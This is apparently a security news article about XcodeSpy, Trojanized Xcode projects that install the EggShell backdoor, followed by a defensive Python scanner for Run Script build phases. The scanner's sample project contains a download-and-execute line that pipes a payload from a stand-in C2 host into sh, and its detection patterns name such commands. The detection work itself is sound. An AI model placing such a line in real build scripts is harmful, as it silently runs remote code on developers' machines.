Thursday, September 23, 2021

Apple developers targeted by EggShell Backdoor


Malicious Xcode projects are being used to hijack developer systems and distribute custom builds of the EggShell backdoor.

The malware, called XcodeSpy, targets Xcode, the integrated development environment (IDE) used on macOS for developing Apple software.

According to research published by SentinelLabs on Thursday, the IDE's Run Script feature is abused in attacks aimed at iOS developers, delivered as Trojanized Xcode projects distributed freely online.

Legitimate, open-source Xcode projects are widely shared on GitHub. In this case, however, the XcodeSpy project advertises “advanced features” for the iOS tab bar, and once the doctored project has been downloaded and built, the malicious script runs and installs the EggShell backdoor.

The malicious project examined by the researchers is a doctored copy of TabBarInteraction, a legitimate project that itself has not been compromised.

The Run Script is injected silently, so that building the project causes the developer's machine to contact the attacker's command-and-control (C2) server.

The abused feature is the IDE functionality that lets a custom shell script execute whenever the application target is built.

The script then contacts the C2 server to download and run a custom variant of the EggShell backdoor, which includes persistence through a user LaunchAgent.

Two versions of EggShell have been discovered, one of which shares an encrypted string with XcodeSpy.

The backdoor can hijack the victim developer's microphone, camera and keyboard, and can capture and upload files to the attacker's C2.

SentinelLabs says at least one US organization has been hit by such an attack, and developers in Asia were likely also targeted in the campaign, which operated at least between July and October last year.

Backdoor samples were uploaded to VirusTotal on August 5 and October 13. The XcodeSpy sample was uploaded on September 4; however, researchers suspect the attacker may have uploaded the sample themselves to test detection rates.

“While XcodeSpy seems to be targeted at developers themselves rather than products or developers’ clients, it is a short step away from redirecting the developer’s workplace to deliver malware to users of that developer’s software,” the researchers said. “As a result, all Apple developers are cautioned to check for any serious Run scripts whenever Xcode projects from third parties are approved.”
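The practical defensive step the researchers describe, reviewing every Run Script build phase before adopting a third-party Xcode project, can be partly automated. The following is an added example written for this article, not code from SentinelLabs or from the TabBarInteraction project. It parses the `project.pbxproj` file that Xcode stores inside every `.xcodeproj` bundle, extracts each `PBXShellScriptBuildPhase` object, decodes its `shellScript` string, and applies a small set of heuristic indicators (network fetch, decoding of blobs, piping into a shell, silenced output, backgrounding, LaunchAgent persistence, long encoded tokens). The indicator list, the scoring rule and the embedded sample project file are all assumptions constructed for this example; the C2 hostname in the sample uses the reserved `.invalid` domain.

```python
"""Scan an Xcode project.pbxproj for Run Script build phases and flag
suspicious shell content. Constructed example; not SentinelLabs tooling."""
import re
import sys
from pathlib import Path
from typing import Optional

# A pbxproj object: 24-hex id, optional /* comment */, then a { ... }; dict.
# Shell-script build phases contain no nested dictionaries, so matching
# non-greedily up to the first "};" is enough for PBXShellScriptBuildPhase.
OBJECT_RE = re.compile(
    r"(?P<id>[0-9A-F]{24})\s*(?:/\*\s*(?P<comment>.*?)\s*\*/)?\s*=\s*\{(?P<body>.*?)\n\s*\};",
    re.DOTALL,
)

# Heuristic indicators (assumptions for this example, not a published ruleset).
INDICATORS = {
    "network_fetch": re.compile(r"\b(curl|wget)\b|urllib|NSURLSession"),
    "decode_blob": re.compile(r"\bbase64\b|xxd -r|openssl enc .*-d"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh|python3?|perl|osascript)\b|\beval\b"),
    "silenced_output": re.compile(r">\s*/dev/null"),
    "backgrounded": re.compile(r"\bnohup\b|\bdisown\b|&\s*$", re.MULTILINE),
    "persistence": re.compile(r"LaunchAgents|LaunchDaemons|\blaunchctl\b"),
    "encoded_payload": re.compile(r"[A-Za-z0-9+/=]{60,}|(?:\\x[0-9a-fA-F]{2}){4,}"),
}


def _field(body: str, key: str) -> Optional[str]:
    """Return a top-level key's value from an object body, unquoting strings."""
    m = re.search(rf'\b{key}\s*=\s*(?:"((?:[^"\\]|\\.)*)"|([^;]+));', body)
    if not m:
        return None
    if m.group(1) is None:
        return m.group(2).strip()
    # Undo pbxproj string escapes (\n, \t, \", \\) so the script reads as typed.
    return re.sub(r"\\(.)", lambda e: {"n": "\n", "t": "\t"}.get(e.group(1), e.group(1)), m.group(1))


def find_run_script_phases(pbxproj: str):
    """Return one dict (id, name, shell, decoded script) per Run Script phase."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj):
        body = m.group("body")
        if not re.search(r"\bisa\s*=\s*PBXShellScriptBuildPhase\s*;", body):
            continue
        phases.append({
            "id": m.group("id"),
            "name": _field(body, "name") or m.group("comment") or "ShellScript",
            "shell": _field(body, "shellPath") or "/bin/sh",
            "script": _field(body, "shellScript") or "",
        })
    return phases


def classify_script(script: str):
    """Sorted names of every indicator that fires on the decoded script."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


def is_suspicious(indicators) -> bool:
    """Single hits (e.g. '>/dev/null' in a lint step) are common in benign
    scripts; escalate on two or more, or on anything piped into a shell."""
    return len(indicators) >= 2 or "pipe_to_shell" in indicators


def scan_pbxproj(pbxproj: str):
    """Attach an indicator list to each Run Script phase found in the text."""
    return [dict(p, indicators=classify_script(p["script"])) for p in find_run_script_phases(pbxproj)]


# Constructed project.pbxproj fragment (not the real TabBarInteraction project):
# one benign lint step and one phase that fetches, decodes and pipes into sh.
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
    archiveVersion = 1;
    objects = {
        0A1B2C3D4E5F6A7B8C9D0E1F /* Project object */ = {
            isa = PBXProject;
            attributes = {
                LastUpgradeCheck = 1240;
            };
            targets = (
                1A1B2C3D4E5F6A7B8C9D0E1F /* TabBarInteraction */,
            );
        };
        2A1B2C3D4E5F6A7B8C9D0E1F /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Lint";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        3A1B2C3D4E5F6A7B8C9D0E1F /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -s https://c2.example.invalid/p | base64 -D | sh &>/dev/null &\n";
        };
    };
    rootObject = 0A1B2C3D4E5F6A7B8C9D0E1F /* Project object */;
}
'''

if __name__ == "__main__":
    # Usage: python3 scan_pbxproj.py MyApp.xcodeproj/project.pbxproj
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for f in scan_pbxproj(text):
        flag = "SUSPICIOUS" if is_suspicious(f["indicators"]) else "review"
        print(f"[{flag}] {f['id']} {f['name']!r} ({f['shell']}): {f['indicators']}")
        print("    " + f["script"].strip().replace("\n", "\n    "))
```

Run against the sample, the lint phase fires only `silenced_output` and is left for manual review, while the second phase fires five indicators and is marked suspicious. The regex-based object extraction is deliberately narrow: it is reliable for build-phase objects, which are flat, but a full pbxproj parser would be needed to walk nested objects such as the project's build settings. Note also that an empty indicator list is not a clean bill of health; every Run Script from an untrusted project still deserves a read-through, since the heuristics only encode common download-and-execute patterns.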

Back in August, Trend Micro tracked the XCSSET malware, spread through Xcode projects, which is thought to compromise Safari browser sessions for identity theft, cross-site scripting (XSS), and theft of developer data.

The team said the discovery eventually led to “a rabbit hole for malicious payloads.”

Priyanshu Vijayvargiya
Founder and Editor-in-Chief of 'Virtualattacks Inc' Priyanshu Vijayvargiya is a cybersecurity analyst, Information Security professional, developer, and a white hat hacker.
